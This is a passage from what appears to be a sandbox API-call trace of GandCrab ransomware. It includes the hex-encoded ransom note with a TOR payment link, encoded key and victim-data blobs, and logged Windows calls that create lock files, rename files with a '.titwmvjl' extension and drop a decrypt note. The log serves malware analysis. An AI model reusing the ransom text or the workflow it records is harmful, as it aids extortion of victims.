\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.449] WriteFile (in: hFile=0x200, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.449] CloseHandle (hObject=0x200) returned 1 [0067.450] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.450] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.450] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x2f6)) [0067.450] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.450] GetWindowsDirectoryW (in: lpBuffer=0x25e0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.450] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x25e0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x25e0600, lpMaximumComponentLength=0x25e0608, lpFileSystemFlags=0x25e0604, lpFileSystemNameBuffer=0x25e0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e0600*=0xd2ca4def, lpMaximumComponentLength=0x25e0608*=0xff, lpFileSystemFlags=0x25e0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.450] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock") returned 40 [0067.450] CreateFileW (lpFileName="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\$recycle.bin\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x200 [0067.452] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.452] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.452] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0067.452] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0067.452] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9c78 [0067.453] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.453] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.453] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.453] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.453] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.453] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.453] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.453] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock") returned="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock" [0067.453] lstrlenW (lpString=".titwmvjl") returned 9 [0067.453] lstrlenW (lpString="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock") returned 40 [0067.453] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.454] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 49 [0067.454] lstrlenW (lpString="C:\\$Recycle.Bin\\d2ca4a09d2ca4deb61a.lock") returned 40 [0067.454] lstrlenW (lpString=".lock") returned 5 [0067.454] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.454] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.454] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.454] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.454] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.454] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0067.454] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0067.455] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-18" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18") returned="C:\\$Recycle.Bin\\S-1-5-18" [0067.455] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\") returned="C:\\$Recycle.Bin\\S-1-5-18\\" [0067.455] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.455] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.455] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.456] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.456] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.456] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.456] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.456] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\\\TITWMVJL-DECRYPT.txt") returned 46 [0067.456] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\\\TITWMVJL-DECRYPT.txt" (normalized: 